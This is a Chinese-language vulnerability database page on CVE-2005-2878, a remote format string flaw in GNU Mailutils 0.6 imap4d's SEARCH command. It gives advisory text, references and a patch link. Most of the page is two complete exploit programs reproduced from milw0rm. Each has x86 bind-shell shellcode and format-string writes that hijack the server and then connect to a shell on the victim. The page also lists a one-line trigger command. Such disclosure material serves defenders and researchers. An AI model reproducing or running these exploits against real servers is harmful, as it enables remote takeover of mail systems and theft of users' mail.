CVE-2005-2878
CVSS7.5
发布时间 :2005-09-13 19:03:00
修订时间 :2016-10-17 23:31:04
NMCOES    

[原文]Format string vulnerability in search.c in the imap4d server in GNU Mailutils 0.6 allows remote authenticated users to execute arbitrary code via format string specifiers in the SEARCH command.


[CNNVD]GNU Mailutils imap4d SEARCH命令远程格式串处理漏洞(CNNVD-200509-101)

        GNU mailutils软件包是一个邮件工具集,包括本地和远程邮箱访问服务。imap4d server允许远程用户通过Internet消息访问协议检索邮件。
        GNU mailutils的imap4d对SEARCH命令的处理上存在格式串漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。如果服务处理了服务端恶意的搜索命令的话就会出现这个漏洞,成功利用这个漏洞需要攻击者有合法的用户名和口令登录到服务器上。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2878
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2878
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-101
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112785181316043&w=2
(UNKNOWN)  BUGTRAQ  20050926 FreeBSD GNU Mailutils 0.6 imap4d exploit
http://savannah.gnu.org/patch/index.php?func=detailitem&item_id=4407
(PATCH)  CONFIRM  http://savannah.gnu.org/patch/index.php?func=detailitem&item_id=4407
http://www.debian.org/security/2005/dsa-841
(UNKNOWN)  DEBIAN  DSA-841
http://www.gentoo.org/security/en/glsa/glsa-200509-10.xml
(UNKNOWN)  GENTOO  GLSA-200509-10
http://www.idefense.com/application/poi/display?id=303&type=vulnerabilities&flashstatus=true
(VENDOR_ADVISORY)  IDEFENSE  20050909 GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability
http://www.rosiello.org/archivio/imap4d_FreeBSD_exploit.c
(UNKNOWN)  MISC  http://www.rosiello.org/archivio/imap4d_FreeBSD_exploit.c
http://www.securityfocus.com/bid/14794
(UNKNOWN)  BID  14794

- 漏洞信息

GNU Mailutils imap4d SEARCH命令远程格式串处理漏洞
高危 格式化字符串
2005-09-13 00:00:00 2005-10-20 00:00:00
远程  
        GNU mailutils软件包是一个邮件工具集,包括本地和远程邮箱访问服务。imap4d server允许远程用户通过Internet消息访问协议检索邮件。
        GNU mailutils的imap4d对SEARCH命令的处理上存在格式串漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。如果服务处理了服务端恶意的搜索命令的话就会出现这个漏洞,成功利用这个漏洞需要攻击者有合法的用户名和口令登录到服务器上。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://savannah.gnu.org/patch/download.php?item_id=4407&item_file_id=5160

- 漏洞信息 (1209)

GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit (EDBID:1209)
linux remote
2005-09-10 Verified
143 Clément Lecigne
N/A [点击下载]
/*
 *  GNU Mailutils 0.6 imap4d 'search' format string exploit.
 *  Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
 *
 *  This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
 *
 *  $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
 *  [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
 *  [+] By clem1.
 *  [+] connecting to: 127.0.0.1:143
 *  [+] authentification: completed.
 *  [+] format string: sended
 *  [+] shellcode sended.
 *  [+] Bingo.
 *  
 *  id;      
 *  uid=1000(clem1) gid=1002(mail) groups=0(root)
 *
 *  Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

struct values {
	int offset;
	int IO_file_close;
	int addr;
	char mailbox[32];
} v = {
	11,
	0x40468bc4,
	0x80906e0, //0xaabbccdd
	"inbox"
};

void usage(char *);
void auth(int, char *, char *);
void sendsc(int);
void owned(int, char *);
void fmtbuild(int);

/*
 * s0t4ipv6@Shellcode.com.ar
 * x86 portbind a shell in port 5074
 */
char sc[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40"
	    "\x50\x89\xe1\xb0\x66\xcd\x80\x31"
	    "\xd2\x52\x66\x68\x13\xd2\x43\x66"
	    "\x53\x89\xe1\x6a\x10\x51\x50\x89"
	    "\xe1\xb0\x66\xcd\x80\x40\x89\x44"
	    "\x24\x04\x43\x43\xb0\x66\xcd\x80"
	    "\x83\xc4\x0c\x52\x52\x43\xb0\x66"
	    "\xcd\x80\x93\x89\xd1\xb0\x3f\xcd"
	    "\x80\x41\x80\xf9\x03\x75\xf6\x52"
	    "\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
	    "\x62\x69\x89\xe3\x52\x53\x89\xe1"
	    "\xb0\x0b\xcd\x80";

char b[1024];
int i;

int main(int ac, char **av){
	char o, *host, *user, *pass;
	struct hostent *h;
	struct sockaddr_in s;
	int port, fd;
	
	puts("[+] GNU Mailutils 0.6 imap4d 'search' format string exploit.");
	puts("[+] By clem1.");

	if(ac != 9) usage(av[0]);
	
	while((o = getopt(ac,av,"h:p:u:s:")) != EOF) {
		switch (o) {
			case 'h':
				host = optarg;
				break;
			case 'p':
				port = atoi(optarg);
				break;
			case 'u':
				user = optarg;
				break;
			case 's':
				pass = optarg;
				break;
			default:
				usage(av[0]);
				break;
		}
	}
	if((h = gethostbyname(host)) == NULL) {
		herror("[-] gethostbyname()");
		exit(1);
        }
	
	printf("[+] connecting to: %s:%d\n", inet_ntoa(*((struct in_addr *)h->h_addr)), port);

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if(fd == -1){
		perror("[-] socket()");
		exit(1);
	}

	s.sin_family = AF_INET;
	s.sin_port = htons(port);
	s.sin_addr = *((struct in_addr *)h->h_addr);
	bzero(&(s.sin_zero), 8);

	if (connect(fd, (struct sockaddr *)&s, sizeof s) == -1) {
		perror("[-] connect()");
		exit(1);
	}

	i = recv(fd, b, 1023, 0);
	b[i] = 0;
	if(strstr(b, "IMAP4rev1") == NULL){
		puts("[-] failled.");
		exit(1);
	}
	/* authentification. */
	auth(fd, user, pass);
	/* build and send evil format string. */
	fmtbuild(fd);
	/* store shellcode in imap4d rwx adresse space. */
	sendsc(fd);
	/* force a call to fclose, uhm no shellcode ;> */
	owned(fd, host);
	return 0;
}

void auth(int fd, char *user, char *pass){
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "1 LOGIN \"%s\" \"%s\"\n", user, pass);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	i = recv(fd, b, 1023, 0);
	b[i] = 0x0;
	if(strstr(b, "Completed") == NULL){
		puts("[-] LOGIN failled.");
		exit(1);
	}
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "2 SELECT \"%s\"\n", v.mailbox);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "Completed") != NULL)
			break;
		if(strstr(b, "Couldn't") != NULL){
			puts("[-] SELECT failled.");
			exit(1);
		}
	}
	puts("[+] authentification: completed.");
	return;
}

void sendsc(int fd){
	memset(b, 0x41, 1024);
	memcpy(b + 900, sc, strlen(sc));
	memcpy(b + 1020, " A\n", 3);
	memcpy(b, "3 LIST ", 7);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "Completed") != NULL)
			break;
		if(strstr(b, "BAD") != NULL){
			puts("[-] LIST failled.");
			exit(1);
		}
	}
	puts("[+] shellcode sended.");
	return;
}

void fmtbuild(int fd){
	unsigned char b0, b1, b2, b3;
	int a1, a2;
	a1 = (v.addr & 0xffff0000) >> 16;
	a2 = (v.addr & 0x0000ffff);
	b0 = (v.IO_file_close >> 24) & 0xff;
	b1 = (v.IO_file_close >> 16) & 0xff;
	b2 = (v.IO_file_close >> 8) & 0xff;
	b3 = (v.IO_file_close) & 0xff;
	snprintf(b, sizeof b,     "3 SEARCH TOPIC "
				  "A" /* pad. */
				  "%c%c%c%c" 
				  "%%.%hdx"
				  "%%%d$hn\n",
				  b3 + 2, b2, b1, b0,
				  a1 - 0x24,
				  v.offset);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "BAD") != NULL)
			break;
	}
	memset(b, 0x0, 1024);
	snprintf(b, sizeof b,     "3 SEARCH TOPIC "
				  "A" /* pad. */
				  "%c%c%c%c" 
				  "%%.%hdx"
				  "%%%d$hn\n",
				  b3, b2, b1, b0,
				  a2 - 0x24,
				  v.offset);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "BAD") != NULL)
			break;
	}
	puts("[+] format string: sended");
	return;
}

void owned(int fd, char *host){
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "3 SUBSCRIBE OWNED\n");
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	puts("[+] Bingo.\n");
	sleep(1);
	execl("/bin/nc", "prout", host, "5074", NULL);
	printf("[-] muh? where is nc?\n[+] A shell is waiting you on %s:5074.\n", host);
	return;	
}

void usage(char *ex){
	printf("usage: %s -h <hostname> -p <port> -u <user> -s <password>\n", ex);
	exit(1);
}

// milw0rm.com [2005-09-10]
		

- 漏洞信息 (1234)

GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit (fbsd) (EDBID:1234)
bsd remote
2005-09-26 Verified
143 Angelo Rosiello
N/A [点击下载]
/*
* Copyright (c) 2005 Rosiello Security
* http://www.rosiello.org
*
* Permission is granted for the redistribution of this software
* electronically. It may not be edited in any way without the express
* written consent of Rosiello Security.
*
* Disclaimer: The author published the information under the condition 
* that is not in the intention of the reader to use them in order to bring 
* to himself or others a profit or to bring to others damage.
*
* --------------------------------------------------------------------------
*
* GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability
* iDEFENSE Security Advisory 09.09.05
* www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* The GNU mailutils package is a collection of mail-related
* utilities, including local and remote mailbox access services.
* More information is available at the following site:
* http://www.gnu.org/software/mailutils/mailutils.html
*
* This exploit shows the possibility to run arbitrary code
* on FreeBSD machines.
*
* Authors: Johnny Mast and Angelo Rosiello
* e-mails: rave@rosiello.org angelo@rosiello.org
*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>


#define ISIP(m)   (!((int)inet_addr(m) ==-1))
#define clean(x)  memset(x, 0 , sizeof x)

char code[] =
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x31\xc0"    /* xor %eax,%eax */
"\x31\xc0"    /* xor %eax,%eax */
"\x50"    /* push %eax */
"\x31\xc0"    /* xor %eax,%eax */
"\x50"    /* push %eax */
"\xb0\x7e"    /* mov $0x7e,%al */
"\x50"    /* push %eax */
"\xcd\x80"    /* int $0x80 */
"\x31\xc0"    /* xor %eax,%eax */

/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0"                   // xorl    %eax,%eax
"\x31\xdb"                   // xorl    %ebx,%ebx
"\x31\xc9"                   // xorl    %ecx,%ecx
"\x31\xd2"                   // xorl    %edx,%edx
"\xb0\x61"                   // movb    $0x61,%al
"\x51"                       // pushl   %ecx 
"\xb1\x06"                   // movb    $0x6,%cl
"\x51"                       // pushl   %ecx
"\xb1\x01"                   // movb    $0x1,%cl   
"\x51"                       // pushl   %ecx
"\xb1\x02"                   // movb    $0x2,%cl
"\x51"                       // pushl   %ecx
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx
"\xcd\x80"                   // int     $0x80

/* it binds on port 30464 */
/* bind(fd, (struct sockaddr*)&sin, sizeof(sin))  */
"\xb1\x02"                   // movb    $0x2,%cl
"\x31\xc9"                   // xorl    %ecx,%ecx
"\x51"                       // pushl   %ecx
"\x51"                       // pushl   %ecx 
"\x51"                       // pushl   %ecx

/* port = 0x77, change if needed */
"\x80\xc1\x77"               // addb    $0x77,%cl  
"\x66\x51"                   // pushw   %cx
"\xb5\x02"                   // movb    $0x2,%ch
"\x66\x51"                   // pushw   %cx 
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\xb2\x10"                   // movb    $0x10,%dl  
"\x52"                       // pushl   %edx
"\x51"                       // pushl   %ecx
"\x50"                       // pushl   %eax
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx 
"\x89\xc2"                   // movl    %eax,%edx
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x68"                   // movb    $0x68,%al
"\xcd\x80"                   // int     $0x80

/* listen(fd, 1)*/
"\xb3\x01"                   // movb    $0x1,%bl 
"\x53"                       // pushl   %ebx
"\x52"                       // pushl   %edx
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x6a"                   // movb    $0x6a,%al
"\xcd\x80"                   // int     $0x80

/* cli = accept(fd, 0,0) */
"\x31\xc0"                   // xorl    %eax,%eax  
"\x50"                       // pushl   %eax
"\x50"                       // pushl   %eax
"\x52"                       // pushl   %edx
"\x8d\x0c\x24"               // leal    (%esp),%ecx
"\x51"                       // pushl   %ecx
"\x31\xc9"                   // xorl    %ecx,%ecx
"\xb0\x1e"                   // movb    $0x1e,%al   
"\xcd\x80"                   // int     $0x80

/* dup2(cli,0) */
"\x89\xc3"                   // movl    %eax,%ebx
"\x53"                       // pushl   %ebx
"\x51"                       // pushl   %ecx
"\x31\xc0"                   // xorl    %eax,%eax  
"\xb0\x5a"                   // movb    $0x5a,%al
"\xcd\x80"                   // int     $0x80

/* dup2(cli, 1) */
"\x41"                       // inc     %ecx
"\x53"                       // pushl   %ebx
"\x51"                       // pushl   %ecx
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x5a"                   // movb    $0x5a,%al
"\xcd\x80"                   // int     $0x80

/* dup2(cli, 2) */
"\x41"                       // inc     %ecx
"\x53"                       // pushl   %ebx
"\x51"                       // pushl   %ecx 
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x5a"                   // movb    $0x5a,%al
"\xcd\x80"                   // int     $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */
"\x31\xdb"                   // xorl    %ebx,%ebx  
"\x53"                       // pushl   %ebx
"\x68\x6e\x2f\x73\x68"       // pushl   $0x68732f6e
"\x68\x2f\x2f\x62\x69"       // pushl   $0x69622f2f
"\x89\xe3"                   // movl    %esp,%ebx
"\x31\xc0"                   // xorl    %eax,%eax
"\x50"                       // pushl   %eax
"\x54"                       // pushl   %esp
"\x53"                       // pushl   %ebx
"\x50"                       // pushl   %eax
"\xb0\x3b"                   // mov     $0x3b,%al
"\xcd\x80"                   // int     $0x80

/* exit(..)  */
"\x31\xc0"                   // xorl    %eax,%eax
"\xb0\x01"                   // mobv    $0x1,%al
"\xcd\x80";                  // int     $0x80



void usage( int argc, char **argv )
{
 
  fprintf(stdout, "%s usage:\n\n", argv[0]);
  fprintf(stdout, "\t-h host\n");
  fprintf(stdout, "\t-p port\n");
  fprintf(stdout, "\t-l login\n");
  fprintf(stdout, "\t-a password\n\n");

  return;
}


void send_message( int fd, char *msg, ... )
{
  char string[2000];
  int len;
  size_t size;

  va_list  args;


  clean(string);


  va_start(args, msg);
  len = vsnprintf(string, sizeof(string)-1, msg,args);
  len = (len >=0) ? len : 0;

  /* Terminating the string */
  string[len]='\0';

  write(fd, string, len);

  return;
}





char *buildstring( long r_addr, long target, int offset, int sock )
{
  unsigned char string[512], a[4];
  int len;
  int high, low, arw;



  high = ( target & 0xffff0000 ) >> 16;
  low =  ( target & 0x0000ffff );

  clean(a); 
  a[0] = (r_addr >> 24) & 0xff;
  a[1] = (r_addr >> 16) & 0xff;
  a[2] = (r_addr >> 8) & 0xff;
  a[3] = (r_addr) & 0xff;
  a[4] = '\0';

  clean(string); 
  len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn\n",
	(int)a[3]+2,a[2],a[1],a[0],
	high -(0x24+13),   	/* Number of bytes for the first write */
	offset	/* The Offset to addr */
        );

  len = (len >=0) ? len : 0;
  string[len] = '\0';
  write(sock, string, len);

  read(sock, string, sizeof(string));


  clean(string);
  len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn%s\n",
       (int) a[3], (int)a[2], (int)a[1],(int)a[0],
        low - (0x24 +13),
        offset,          /* The offset to addr +2 */
	code
        );

  len = (len >=0) ? len : 0;
  string[len] = '\0';
  write(sock, string, len);


  return (char *)strdup(string);	
}


void get_addr_as_char( u_int addr, char *buf ) 
{
  *(u_int*)buf = addr;
  if (!buf[0]) buf[0]++;
  if (!buf[1]) buf[1]++;
  if (!buf[2]) buf[2]++;
  if (!buf[3]) buf[3]++;
}

static int got_entry = 0x08057a0c+4;


int comun( char *host, struct sockaddr_in sin4 )
{
  char *a[4] = { "/usr/bin/telnet", host , "30464", NULL };
  execve(a[0],a, NULL);
  return 0;
}

void welcome( )
{
  fprintf( stdout, "\nCopyright (c) 2005 Rosiello Security\n" );
  fprintf( stdout, "http://www.rosiello.org\n" );
  fprintf( stdout, "imap4d Format String Exploiter for FreeBSD\n\n" );
}

int main( int argc, char **argv )
{
  struct  hostent    *hp;
  struct sockaddr_in sin4;
  char shellbuf[1030];
  char *host, buffer[512], *ptr, *p, *USER, *PASS;
  int ch, port = 0, sock, offset = 1;
  int login  = 0, i, calc = 0;
  int ret = 0, len  = 0, b;
  int have_shell_loc = 0;
  unsigned int shell_addr = (u_int)0x0806c000;

  welcome( );

  if ( argc < 9 )
  { 
    usage(argc, argv);
    exit(EXIT_SUCCESS);
  }

  if (!(host = malloc (128)))
  {
    fprintf(stderr, "exp.c:115 Could not allocate memory\n");
    exit(EXIT_FAILURE);
  }


  while((ch = getopt(argc, argv, "h:p:l:a:")) != EOF) 
  {
   switch(ch) 
   {
      case 'h':
      host = (char *)strdup(optarg);
      break;

      case 'V':
      break;

      case 'p':
      port =  atoi (optarg);
      break;
 
      case 'l':
      USER = (char *)optarg;
      break;

      case 'a':
      PASS = (char *)optarg;
      break;

      default:
      usage(argc, argv);
      break;
 }	
}


 
  if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  {
    fprintf(stderr, "exp.c:139 Error creating an new socket"); 
    exit(EXIT_FAILURE);
  }

  host = (host) ? host : "localhost";
  port = (port) ? port : 143;

  if (!(ISIP(host)))
  {
     if (!(hp = gethostbyname(host)))
     {
       fprintf(stderr, "exp.c:152 Could not resolve ip address\n");	
       exit(EXIT_FAILURE);
     } 

     memcpy(&sin4.sin_addr,hp->h_addr,hp->h_length);
     host = (char *)strdup(inet_ntoa(sin4.sin_addr)); 
  } else 
    sin4.sin_addr.s_addr = inet_addr(host);

 


  sin4.sin_family = AF_INET;
  sin4.sin_port = (unsigned short)htons( port );

  fprintf(stdout, "[+] Connecting to %s:%d\n", host,port);

  if ((connect(sock, (struct sockaddr *)&sin4,sizeof(struct sockaddr))) < 0)
  { 
     fprintf(stderr, "[*] exp.c:178 Connection failed\n");
     exit(EXIT_FAILURE);
  }


  fprintf(stdout, "[+] Connected .. \n");
  fprintf(stdout, "[+] Sending login ... \n");

  send_message(sock, "1 LOGIN %s %s\r\n", USER, PASS);
  fprintf(stdout, "[+] Done ... \n");

  while ((read(sock, buffer, 512)) > 0)
  {
    if ( login == 0  && ret == 0)
    switch (buffer[0])
    {

     case '1':
     fprintf(stdout, "[+] Selecting inbox ..\n");
     send_message(sock, "2 Select inbox\n");
     fprintf(stdout, "[+] Selecting Done .. Starting brute sequence\n");
     send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset);
     login = 1;
     break;
    }


    if ((ptr=strstr(buffer, "(near")) && login == 1)
    {
      ptr +=15;
      if ((strncmp(ptr, "41414141",8))!=0) 
      {
        offset ++;
        send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset);
      }
      else 
      {
        fprintf(stdout, "[+] Found offset %d\n", offset);
	fprintf(stdout, "[+] Finding buffer on the stack\n");
	ret = 1;
	login = 0;
        clean(buffer);
      }
    } 

    if ( ret == 1 )
    {
	
      if ((ptr=strstr(buffer, "(near"))) 
      {
        ptr +=6+4 +1; /* +4 for the addr string*/
	/* +1 for the junk char */
	calc = strlen(buffer) - strlen(ptr);
	calc -=6+4+1;	
	
	for (i = 0; i < strlen(buffer); i++) 
        {  
           if ( (strncmp(ptr, code, strlen(code)))==0 && have_shell_loc !=1)
           {
	     shell_addr += i -4;
	     have_shell_loc = 1;
	     sleep(2);
             buildstring(got_entry, shell_addr+=3, offset, sock);
             fprintf(stdout,"[+] Decoy found at %p\n", shell_addr);
       	     close(sock);
	     fprintf(stdout, "[+] Trying to contact the bind shell ..\n");
    	     if((comun(host, sin4)) < 0)
	       fprintf(stderr, "[-] Exploit failed\n");
           } 
           else
             ++ptr;
        } 
      }      
      if( shell_addr > 0xc0000000)
        break;
      shell_addr++;
      ptr = ((char *)&shell_addr);
      ptr[4] = 0;
      if ( strchr(ptr, 0xa) || strchr(ptr, 0xd) || ptr[0]==0x00) 
      {
        shell_addr ++;
        ptr = ((char *)&shell_addr);
        ptr[4] = 0;
      } 
      while (strlen(ptr) !=4)
      {
        shell_addr++;
        ptr = ((char *)&shell_addr);
        ptr[4] = 0;
      }
      if (have_shell_loc != 1)
      {
        send_message(sock, "3 search topic .%s....%%%d$s%sCCCC\n",ptr,offset,code);
      }
    }
    clean(buffer);
  }

  fprintf(stderr, "[+] Closing connection\n");
  close(sock);
  free(host);

  fprintf(stderr, "[-] Exploit failed %p\n", shell_addr);
  return 0;
}

// milw0rm.com [2005-09-26]
		

- 漏洞信息

19306
GNU Mailutils imap4d SEARCH Command Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-09-09 2005-08-09
2005-09-11 2005-09-09

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GNU Mailutils Imap4D Search Command Remote Format String Vulnerability
Input Validation Error 14794
Yes No
2005-09-09 12:00:00 2007-04-24 06:30:00
An anonymous researcher discovered this vulnerability.

- 受影响的程序版本

GNU Mailutils 0.6.1
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
GNU Mailutils 0.6
+ Gentoo Linux

- 漏洞讨论

The 'imap4d' daemon is prone to a remote format-string vulnerability.

The issue presents itself when the service handles malicious search commands from a client.

A successful attack may allow attackers to execute arbitrary code, which may help them gain unauthorized access or escalate privileges in the context of the server.

This issue has been confirmed in GNU Mailutils 0.6; other versions may be vulnerable as well.

- 漏洞利用

The following search command is sufficient to trigger this issue:

SEARCH TOPIC %s%s%s

Exploit code is available.

- 解决方案

The vendor has released a patch to address this issue. Please see the references for details.


GNU Mailutils 0.6

GNU Mailutils 0.6.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站